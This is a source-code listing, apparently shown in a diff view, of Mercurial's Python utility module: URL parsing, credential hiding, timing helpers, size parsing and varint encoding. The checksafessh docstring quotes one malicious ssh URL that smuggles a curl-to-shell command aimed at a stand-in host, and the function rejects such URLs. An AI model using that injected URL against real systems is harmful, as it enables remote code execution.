2955 2957 >>> url(b'http://www.ietf.org/rfc/rfc2396.txt')
2956 2958 <url scheme: 'http', host: 'www.ietf.org', path: 'rfc/rfc2396.txt'>
2957 2959 >>> url(b'ssh://[::1]:2200//home/joe/repo')
2958 2960 <url scheme: 'ssh', host: '[::1]', port: '2200', path: '/home/joe/repo'>
2959 2961 >>> url(b'file:///home/joe/repo')
2960 2962 <url scheme: 'file', path: '/home/joe/repo'>
2961 2963 >>> url(b'file:///c:/temp/foo/')
2962 2964 <url scheme: 'file', path: 'c:/temp/foo/'>
2963 2965 >>> url(b'bundle:foo')
2964 2966 <url scheme: 'bundle', path: 'foo'>
2965 2967 >>> url(b'bundle://../foo')
2966 2968 <url scheme: 'bundle', path: '../foo'>
2967 2969 >>> url(br'c:\foo\bar')
2968 2970 <url path: 'c:\\foo\\bar'>
2969 2971 >>> url(br'\\blah\blah\blah')
2970 2972 <url path: '\\\\blah\\blah\\blah'>
2971 2973 >>> url(br'\\blah\blah\blah#baz')
2972 2974 <url path: '\\\\blah\\blah\\blah', fragment: 'baz'>
2973 2975 >>> url(br'file:///C:\users\me')
2974 2976 <url scheme: 'file', path: 'C:\\users\\me'>
2975 2977
2976 2978 Authentication credentials:
2977 2979
2978 2980 >>> url(b'ssh://joe:xyz@x/repo')
2979 2981 <url scheme: 'ssh', user: 'joe', passwd: 'xyz', host: 'x', path: 'repo'>
2980 2982 >>> url(b'ssh://joe@x/repo')
2981 2983 <url scheme: 'ssh', user: 'joe', host: 'x', path: 'repo'>
2982 2984
2983 2985 Query strings and fragments:
2984 2986
2985 2987 >>> url(b'http://host/a?b#c')
2986 2988 <url scheme: 'http', host: 'host', path: 'a', query: 'b', fragment: 'c'>
2987 2989 >>> url(b'http://host/a?b#c', parsequery=False, parsefragment=False)
2988 2990 <url scheme: 'http', host: 'host', path: 'a?b#c'>
2989 2991
2990 2992 Empty path:
2991 2993
2992 2994 >>> url(b'')
2993 2995 <url path: ''>
2994 2996 >>> url(b'#a')
2995 2997 <url path: '', fragment: 'a'>
2996 2998 >>> url(b'http://host/')
2997 2999 <url scheme: 'http', host: 'host', path: ''>
2998 3000 >>> url(b'http://host/#a')
2999 3001 <url scheme: 'http', host: 'host', path: '', fragment: 'a'>
3000 3002
3001 3003 Only scheme:
3002 3004
3003 3005 >>> url(b'http:')
3004 3006 <url scheme: 'http'>
3005 3007 """
3006 3008
3007 3009 _safechars = b"!~*'()+"
3008 3010 _safepchars = b"/!~*'()+:\\"
3009 3011 _matchscheme = remod.compile(b'^[a-zA-Z0-9+.\\-]+:').match
3010 3012
3011 3013 def __init__(self, path, parsequery=True, parsefragment=True):
3012 3014 # We slowly chomp away at path until we have only the path left
3013 3015 self.scheme = self.user = self.passwd = self.host = None
3014 3016 self.port = self.path = self.query = self.fragment = None
3015 3017 self._localpath = True
3016 3018 self._hostport = b''
3017 3019 self._origpath = path
3018 3020
3019 3021 if parsefragment and b'#' in path:
3020 3022 path, self.fragment = path.split(b'#', 1)
3021 3023
3022 3024 # special case for Windows drive letters and UNC paths
3023 3025 if hasdriveletter(path) or path.startswith(b'\\\\'):
3024 3026 self.path = path
3025 3027 return
3026 3028
3027 3029 # For compatibility reasons, we can't handle bundle paths as
3028 3030 # normal URLS
3029 3031 if path.startswith(b'bundle:'):
3030 3032 self.scheme = b'bundle'
3031 3033 path = path[7:]
3032 3034 if path.startswith(b'//'):
3033 3035 path = path[2:]
3034 3036 self.path = path
3035 3037 return
3036 3038
3037 3039 if self._matchscheme(path):
3038 3040 parts = path.split(b':', 1)
3039 3041 if parts[0]:
3040 3042 self.scheme, path = parts
3041 3043 self._localpath = False
3042 3044
3043 3045 if not path:
3044 3046 path = None
3045 3047 if self._localpath:
3046 3048 self.path = b''
3047 3049 return
3048 3050 else:
3049 3051 if self._localpath:
3050 3052 self.path = path
3051 3053 return
3052 3054
3053 3055 if parsequery and b'?' in path:
3054 3056 path, self.query = path.split(b'?', 1)
3055 3057 if not path:
3056 3058 path = None
3057 3059 if not self.query:
3058 3060 self.query = None
3059 3061
3060 3062 # // is required to specify a host/authority
3061 3063 if path and path.startswith(b'//'):
3062 3064 parts = path[2:].split(b'/', 1)
3063 3065 if len(parts) > 1:
3064 3066 self.host, path = parts
3065 3067 else:
3066 3068 self.host = parts[0]
3067 3069 path = None
3068 3070 if not self.host:
3069 3071 self.host = None
3070 3072 # path of file:///d is /d
3071 3073 # path of file:///d:/ is d:/, not /d:/
3072 3074 if path and not hasdriveletter(path):
3073 3075 path = b'/' + path
3074 3076
3075 3077 if self.host and b'@' in self.host:
3076 3078 self.user, self.host = self.host.rsplit(b'@', 1)
3077 3079 if b':' in self.user:
3078 3080 self.user, self.passwd = self.user.split(b':', 1)
3079 3081 if not self.host:
3080 3082 self.host = None
3081 3083
3082 3084 # Don't split on colons in IPv6 addresses without ports
3083 3085 if (
3084 3086 self.host
3085 3087 and b':' in self.host
3086 3088 and not (
3087 3089 self.host.startswith(b'[') and self.host.endswith(b']')
3088 3090 )
3089 3091 ):
3090 3092 self._hostport = self.host
3091 3093 self.host, self.port = self.host.rsplit(b':', 1)
3092 3094 if not self.host:
3093 3095 self.host = None
3094 3096
3095 3097 if (
3096 3098 self.host
3097 3099 and self.scheme == b'file'
3098 3100 and self.host not in (b'localhost', b'127.0.0.1', b'[::1]')
3099 3101 ):
3100 3102 raise error.Abort(
3101 3103 _(b'file:// URLs can only refer to localhost')
3102 3104 )
3103 3105
3104 3106 self.path = path
3105 3107
3106 3108 # leave the query string escaped
3107 3109 for a in (b'user', b'passwd', b'host', b'port', b'path', b'fragment'):
3108 3110 v = getattr(self, a)
3109 3111 if v is not None:
3110 3112 setattr(self, a, urlreq.unquote(v))
3111 3113
3112 3114 @encoding.strmethod
3113 3115 def __repr__(self):
3114 3116 attrs = []
3115 3117 for a in (
3116 3118 b'scheme',
3117 3119 b'user',
3118 3120 b'passwd',
3119 3121 b'host',
3120 3122 b'port',
3121 3123 b'path',
3122 3124 b'query',
3123 3125 b'fragment',
3124 3126 ):
3125 3127 v = getattr(self, a)
3126 3128 if v is not None:
3127 3129 attrs.append(b'%s: %r' % (a, pycompat.bytestr(v)))
3128 3130 return b'<url %s>' % b', '.join(attrs)
3129 3131
3130 3132 def __bytes__(self):
3131 3133 r"""Join the URL's components back into a URL string.
3132 3134
3133 3135 Examples:
3134 3136
3135 3137 >>> bytes(url(b'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'))
3136 3138 'http://user:pw@host:80/c:/bob?fo:oo#ba:ar'
3137 3139 >>> bytes(url(b'http://user:pw@host:80/?foo=bar&baz=42'))
3138 3140 'http://user:pw@host:80/?foo=bar&baz=42'
3139 3141 >>> bytes(url(b'http://user:pw@host:80/?foo=bar%3dbaz'))
3140 3142 'http://user:pw@host:80/?foo=bar%3dbaz'
3141 3143 >>> bytes(url(b'ssh://user:pw@[::1]:2200//home/joe#'))
3142 3144 'ssh://user:pw@[::1]:2200//home/joe#'
3143 3145 >>> bytes(url(b'http://localhost:80//'))
3144 3146 'http://localhost:80//'
3145 3147 >>> bytes(url(b'http://localhost:80/'))
3146 3148 'http://localhost:80/'
3147 3149 >>> bytes(url(b'http://localhost:80'))
3148 3150 'http://localhost:80/'
3149 3151 >>> bytes(url(b'bundle:foo'))
3150 3152 'bundle:foo'
3151 3153 >>> bytes(url(b'bundle://../foo'))
3152 3154 'bundle:../foo'
3153 3155 >>> bytes(url(b'path'))
3154 3156 'path'
3155 3157 >>> bytes(url(b'file:///tmp/foo/bar'))
3156 3158 'file:///tmp/foo/bar'
3157 3159 >>> bytes(url(b'file:///c:/tmp/foo/bar'))
3158 3160 'file:///c:/tmp/foo/bar'
3159 3161 >>> print(url(br'bundle:foo\bar'))
3160 3162 bundle:foo\bar
3161 3163 >>> print(url(br'file:///D:\data\hg'))
3162 3164 file:///D:\data\hg
3163 3165 """
3164 3166 if self._localpath:
3165 3167 s = self.path
3166 3168 if self.scheme == b'bundle':
3167 3169 s = b'bundle:' + s
3168 3170 if self.fragment:
3169 3171 s += b'#' + self.fragment
3170 3172 return s
3171 3173
3172 3174 s = self.scheme + b':'
3173 3175 if self.user or self.passwd or self.host:
3174 3176 s += b'//'
3175 3177 elif self.scheme and (
3176 3178 not self.path
3177 3179 or self.path.startswith(b'/')
3178 3180 or hasdriveletter(self.path)
3179 3181 ):
3180 3182 s += b'//'
3181 3183 if hasdriveletter(self.path):
3182 3184 s += b'/'
3183 3185 if self.user:
3184 3186 s += urlreq.quote(self.user, safe=self._safechars)
3185 3187 if self.passwd:
3186 3188 s += b':' + urlreq.quote(self.passwd, safe=self._safechars)
3187 3189 if self.user or self.passwd:
3188 3190 s += b'@'
3189 3191 if self.host:
3190 3192 if not (self.host.startswith(b'[') and self.host.endswith(b']')):
3191 3193 s += urlreq.quote(self.host)
3192 3194 else:
3193 3195 s += self.host
3194 3196 if self.port:
3195 3197 s += b':' + urlreq.quote(self.port)
3196 3198 if self.host:
3197 3199 s += b'/'
3198 3200 if self.path:
3199 3201 # TODO: similar to the query string, we should not unescape the
3200 3202 # path when we store it, the path might contain '%2f' = '/',
3201 3203 # which we should *not* escape.
3202 3204 s += urlreq.quote(self.path, safe=self._safepchars)
3203 3205 if self.query:
3204 3206 # we store the query in escaped form.
3205 3207 s += b'?' + self.query
3206 3208 if self.fragment is not None:
3207 3209 s += b'#' + urlreq.quote(self.fragment, safe=self._safepchars)
3208 3210 return s
3209 3211
3210 3212 __str__ = encoding.strmethod(__bytes__)
3211 3213
3212 3214 def authinfo(self):
3213 3215 user, passwd = self.user, self.passwd
3214 3216 try:
3215 3217 self.user, self.passwd = None, None
3216 3218 s = bytes(self)
3217 3219 finally:
3218 3220 self.user, self.passwd = user, passwd
3219 3221 if not self.user:
3220 3222 return (s, None)
3221 3223 # authinfo[1] is passed to urllib2 password manager, and its
3222 3224 # URIs must not contain credentials. The host is passed in the
3223 3225 # URIs list because Python < 2.4.3 uses only that to search for
3224 3226 # a password.
3225 3227 return (s, (None, (s, self.host), self.user, self.passwd or b''))
3226 3228
3227 3229 def isabs(self):
3228 3230 if self.scheme and self.scheme != b'file':
3229 3231 return True # remote URL
3230 3232 if hasdriveletter(self.path):
3231 3233 return True # absolute for our purposes - can't be joined()
3232 3234 if self.path.startswith(br'\\'):
3233 3235 return True # Windows UNC path
3234 3236 if self.path.startswith(b'/'):
3235 3237 return True # POSIX-style
3236 3238 return False
3237 3239
3238 3240 def localpath(self):
3239 3241 if self.scheme == b'file' or self.scheme == b'bundle':
3240 3242 path = self.path or b'/'
3241 3243 # For Windows, we need to promote hosts containing drive
3242 3244 # letters to paths with drive letters.
3243 3245 if hasdriveletter(self._hostport):
3244 3246 path = self._hostport + b'/' + self.path
3245 3247 elif (
3246 3248 self.host is not None and self.path and not hasdriveletter(path)
3247 3249 ):
3248 3250 path = b'/' + path
3249 3251 return path
3250 3252 return self._origpath
3251 3253
3252 3254 def islocal(self):
3253 3255 '''whether localpath will return something that posixfile can open'''
3254 3256 return (
3255 3257 not self.scheme
3256 3258 or self.scheme == b'file'
3257 3259 or self.scheme == b'bundle'
3258 3260 )
3259 3261
3260 3262
3261 3263 def hasscheme(path):
3262 3264 return bool(url(path).scheme)
3263 3265
3264 3266
3265 3267 def hasdriveletter(path):
3266 3268 return path and path[1:2] == b':' and path[0:1].isalpha()
3267 3269
3268 3270
3269 3271 def urllocalpath(path):
3270 3272 return url(path, parsequery=False, parsefragment=False).localpath()
3271 3273
3272 3274
3273 3275 def checksafessh(path):
3274 3276 """check if a path / url is a potentially unsafe ssh exploit (SEC)
3275 3277
3276 3278 This is a sanity check for ssh urls. ssh will parse the first item as
3277 3279 an option; e.g. ssh://-oProxyCommand=curl${IFS}bad.server|sh/path.
3278 3280 Let's prevent these potentially exploited urls entirely and warn the
3279 3281 user.
3280 3282
3281 3283 Raises an error.Abort when the url is unsafe.
3282 3284 """
3283 3285 path = urlreq.unquote(path)
3284 3286 if path.startswith(b'ssh://-') or path.startswith(b'svn+ssh://-'):
3285 3287 raise error.Abort(
3286 3288 _(b'potentially unsafe url: %r') % (pycompat.bytestr(path),)
3287 3289 )
3288 3290
3289 3291
3290 3292 def hidepassword(u):
3291 3293 '''hide user credential in a url string'''
3292 3294 u = url(u)
3293 3295 if u.passwd:
3294 3296 u.passwd = b'***'
3295 3297 return bytes(u)
3296 3298
3297 3299
3298 3300 def removeauth(u):
3299 3301 '''remove all authentication information from a url string'''
3300 3302 u = url(u)
3301 3303 u.user = u.passwd = None
3302 3304 return bytes(u)
3303 3305
3304 3306
3305 3307 timecount = unitcountfn(
3306 3308 (1, 1e3, _(b'%.0f s')),
3307 3309 (100, 1, _(b'%.1f s')),
3308 3310 (10, 1, _(b'%.2f s')),
3309 3311 (1, 1, _(b'%.3f s')),
3310 3312 (100, 0.001, _(b'%.1f ms')),
3311 3313 (10, 0.001, _(b'%.2f ms')),
3312 3314 (1, 0.001, _(b'%.3f ms')),
3313 3315 (100, 0.000001, _(b'%.1f us')),
3314 3316 (10, 0.000001, _(b'%.2f us')),
3315 3317 (1, 0.000001, _(b'%.3f us')),
3316 3318 (100, 0.000000001, _(b'%.1f ns')),
3317 3319 (10, 0.000000001, _(b'%.2f ns')),
3318 3320 (1, 0.000000001, _(b'%.3f ns')),
3319 3321 )
3320 3322
3321 3323
3322 3324 @attr.s
3323 3325 class timedcmstats(object):
3324 3326 """Stats information produced by the timedcm context manager on entering."""
3325 3327
3326 3328 # the starting value of the timer as a float (meaning and resulution is
3327 3329 # platform dependent, see util.timer)
3328 3330 start = attr.ib(default=attr.Factory(lambda: timer()))
3329 3331 # the number of seconds as a floating point value; starts at 0, updated when
3330 3332 # the context is exited.
3331 3333 elapsed = attr.ib(default=0)
3332 3334 # the number of nested timedcm context managers.
3333 3335 level = attr.ib(default=1)
3334 3336
3335 3337 def __bytes__(self):
3336 3338 return timecount(self.elapsed) if self.elapsed else b'<unknown>'
3337 3339
3338 3340 __str__ = encoding.strmethod(__bytes__)
3339 3341
3340 3342
3341 3343 @contextlib.contextmanager
3342 3344 def timedcm(whencefmt, *whenceargs):
3343 3345 """A context manager that produces timing information for a given context.
3344 3346
3345 3347 On entering a timedcmstats instance is produced.
3346 3348
3347 3349 This context manager is reentrant.
3348 3350
3349 3351 """
3350 3352 # track nested context managers
3351 3353 timedcm._nested += 1
3352 3354 timing_stats = timedcmstats(level=timedcm._nested)
3353 3355 try:
3354 3356 with tracing.log(whencefmt, *whenceargs):
3355 3357 yield timing_stats
3356 3358 finally:
3357 3359 timing_stats.elapsed = timer() - timing_stats.start
3358 3360 timedcm._nested -= 1
3359 3361
3360 3362
3361 3363 timedcm._nested = 0
3362 3364
3363 3365
3364 3366 def timed(func):
3365 3367 '''Report the execution time of a function call to stderr.
3366 3368
3367 3369 During development, use as a decorator when you need to measure
3368 3370 the cost of a function, e.g. as follows:
3369 3371
3370 3372 @util.timed
3371 3373 def foo(a, b, c):
3372 3374 pass
3373 3375 '''
3374 3376
3375 3377 def wrapper(*args, **kwargs):
3376 3378 with timedcm(pycompat.bytestr(func.__name__)) as time_stats:
3377 3379 result = func(*args, **kwargs)
3378 3380 stderr = procutil.stderr
3379 3381 stderr.write(
3380 3382 b'%s%s: %s\n'
3381 3383 % (
3382 3384 b' ' * time_stats.level * 2,
3383 3385 pycompat.bytestr(func.__name__),
3384 3386 time_stats,
3385 3387 )
3386 3388 )
3387 3389 return result
3388 3390
3389 3391 return wrapper
3390 3392
3391 3393
3392 3394 _sizeunits = (
3393 3395 (b'm', 2 ** 20),
3394 3396 (b'k', 2 ** 10),
3395 3397 (b'g', 2 ** 30),
3396 3398 (b'kb', 2 ** 10),
3397 3399 (b'mb', 2 ** 20),
3398 3400 (b'gb', 2 ** 30),
3399 3401 (b'b', 1),
3400 3402 )
3401 3403
3402 3404
3403 3405 def sizetoint(s):
3404 3406 '''Convert a space specifier to a byte count.
3405 3407
3406 3408 >>> sizetoint(b'30')
3407 3409 30
3408 3410 >>> sizetoint(b'2.2kb')
3409 3411 2252
3410 3412 >>> sizetoint(b'6M')
3411 3413 6291456
3412 3414 '''
3413 3415 t = s.strip().lower()
3414 3416 try:
3415 3417 for k, u in _sizeunits:
3416 3418 if t.endswith(k):
3417 3419 return int(float(t[: -len(k)]) * u)
3418 3420 return int(t)
3419 3421 except ValueError:
3420 3422 raise error.ParseError(_(b"couldn't parse size: %s") % s)
3421 3423
3422 3424
3423 3425 class hooks(object):
3424 3426 '''A collection of hook functions that can be used to extend a
3425 3427 function's behavior. Hooks are called in lexicographic order,
3426 3428 based on the names of their sources.'''
3427 3429
3428 3430 def __init__(self):
3429 3431 self._hooks = []
3430 3432
3431 3433 def add(self, source, hook):
3432 3434 self._hooks.append((source, hook))
3433 3435
3434 3436 def __call__(self, *args):
3435 3437 self._hooks.sort(key=lambda x: x[0])
3436 3438 results = []
3437 3439 for source, hook in self._hooks:
3438 3440 results.append(hook(*args))
3439 3441 return results
3440 3442
3441 3443
3442 3444 def getstackframes(skip=0, line=b' %-*s in %s\n', fileline=b'%s:%d', depth=0):
3443 3445 '''Yields lines for a nicely formatted stacktrace.
3444 3446 Skips the 'skip' last entries, then return the last 'depth' entries.
3445 3447 Each file+linenumber is formatted according to fileline.
3446 3448 Each line is formatted according to line.
3447 3449 If line is None, it yields:
3448 3450 length of longest filepath+line number,
3449 3451 filepath+linenumber,
3450 3452 function
3451 3453
3452 3454 Not be used in production code but very convenient while developing.
3453 3455 '''
3454 3456 entries = [
3455 3457 (fileline % (pycompat.sysbytes(fn), ln), pycompat.sysbytes(func))
3456 3458 for fn, ln, func, _text in traceback.extract_stack()[: -skip - 1]
3457 3459 ][-depth:]
3458 3460 if entries:
3459 3461 fnmax = max(len(entry[0]) for entry in entries)
3460 3462 for fnln, func in entries:
3461 3463 if line is None:
3462 3464 yield (fnmax, fnln, func)
3463 3465 else:
3464 3466 yield line % (fnmax, fnln, func)
3465 3467
3466 3468
3467 3469 def debugstacktrace(
3468 3470 msg=b'stacktrace',
3469 3471 skip=0,
3470 3472 f=procutil.stderr,
3471 3473 otherf=procutil.stdout,
3472 3474 depth=0,
3473 3475 prefix=b'',
3474 3476 ):
3475 3477 '''Writes a message to f (stderr) with a nicely formatted stacktrace.
3476 3478 Skips the 'skip' entries closest to the call, then show 'depth' entries.
3477 3479 By default it will flush stdout first.
3478 3480 It can be used everywhere and intentionally does not require an ui object.
3479 3481 Not be used in production code but very convenient while developing.
3480 3482 '''
3481 3483 if otherf:
3482 3484 otherf.flush()
3483 3485 f.write(b'%s%s at:\n' % (prefix, msg.rstrip()))
3484 3486 for line in getstackframes(skip + 1, depth=depth):
3485 3487 f.write(prefix + line)
3486 3488 f.flush()
3487 3489
3488 3490
3489 3491 # convenient shortcut
3490 3492 dst = debugstacktrace
3491 3493
3492 3494
3493 3495 def safename(f, tag, ctx, others=None):
3494 3496 """
3495 3497 Generate a name that it is safe to rename f to in the given context.
3496 3498
3497 3499 f: filename to rename
3498 3500 tag: a string tag that will be included in the new name
3499 3501 ctx: a context, in which the new name must not exist
3500 3502 others: a set of other filenames that the new name must not be in
3501 3503
3502 3504 Returns a file name of the form oldname~tag[~number] which does not exist
3503 3505 in the provided context and is not in the set of other names.
3504 3506 """
3505 3507 if others is None:
3506 3508 others = set()
3507 3509
3508 3510 fn = b'%s~%s' % (f, tag)
3509 3511 if fn not in ctx and fn not in others:
3510 3512 return fn
3511 3513 for n in itertools.count(1):
3512 3514 fn = b'%s~%s~%s' % (f, tag, n)
3513 3515 if fn not in ctx and fn not in others:
3514 3516 return fn
3515 3517
3516 3518
3517 3519 def readexactly(stream, n):
3518 3520 '''read n bytes from stream.read and abort if less was available'''
3519 3521 s = stream.read(n)
3520 3522 if len(s) < n:
3521 3523 raise error.Abort(
3522 3524 _(b"stream ended unexpectedly (got %d bytes, expected %d)")
3523 3525 % (len(s), n)
3524 3526 )
3525 3527 return s
3526 3528
3527 3529
3528 3530 def uvarintencode(value):
3529 3531 """Encode an unsigned integer value to a varint.
3530 3532
3531 3533 A varint is a variable length integer of 1 or more bytes. Each byte
3532 3534 except the last has the most significant bit set. The lower 7 bits of
3533 3535 each byte store the 2's complement representation, least significant group
3534 3536 first.
3535 3537
3536 3538 >>> uvarintencode(0)
3537 3539 '\\x00'
3538 3540 >>> uvarintencode(1)
3539 3541 '\\x01'
3540 3542 >>> uvarintencode(127)
3541 3543 '\\x7f'
3542 3544 >>> uvarintencode(1337)
3543 3545 '\\xb9\\n'
3544 3546 >>> uvarintencode(65536)
3545 3547 '\\x80\\x80\\x04'
3546 3548 >>> uvarintencode(-1)
3547 3549 Traceback (most recent call last):
3548 3550 ...
3549 3551 ProgrammingError: negative value for uvarint: -1
3550 3552 """
3551 3553 if value < 0:
3552 3554 raise error.ProgrammingError(b'negative value for uvarint: %d' % value)
3553 3555 bits = value & 0x7F
3554 3556 value >>= 7
3555 3557 bytes = []
3556 3558 while value:
3557 3559 bytes.append(pycompat.bytechr(0x80 | bits))
3558 3560 bits = value & 0x7F
3559 3561 value >>= 7
3560 3562 bytes.append(pycompat.bytechr(bits))
3561 3563
3562 3564 return b''.join(bytes)
3563 3565
3564 3566
3565 3567 def uvarintdecodestream(fh):
3566 3568 """Decode an unsigned variable length integer from a stream.
3567 3569
3568 3570 The passed argument is anything that has a ``.read(N)`` method.
3569 3571
3570 3572 >>> try:
3571 3573 ... from StringIO import StringIO as BytesIO
3572 3574 ... except ImportError:
3573 3575 ... from io import BytesIO
3574 3576 >>> uvarintdecodestream(BytesIO(b'\\x00'))
3575 3577 0
3576 3578 >>> uvarintdecodestream(BytesIO(b'\\x01'))
3577 3579 1
3578 3580 >>> uvarintdecodestream(BytesIO(b'\\x7f'))
3579 3581 127
3580 3582 >>> uvarintdecodestream(BytesIO(b'\\xb9\\n'))
3581 3583 1337
3582 3584 >>> uvarintdecodestream(BytesIO(b'\\x80\\x80\\x04'))
3583 3585 65536
3584 3586 >>> uvarintdecodestream(BytesIO(b'\\x80'))
3585 3587 Traceback (most recent call last):
3586 3588 ...
3587 3589 Abort: stream ended unexpectedly (got 0 bytes, expected 1)
3588 3590 """
3589 3591 result = 0
3590 3592 shift = 0
3591 3593 while True:
3592 3594 byte = ord(readexactly(fh, 1))
3593 3595 result |= (byte & 0x7F) << shift
3594 3596 if not (byte & 0x80):
3595 3597 return result
3596 3598 shift += 7
General Comments 0
You need to be logged in to leave comments. Login now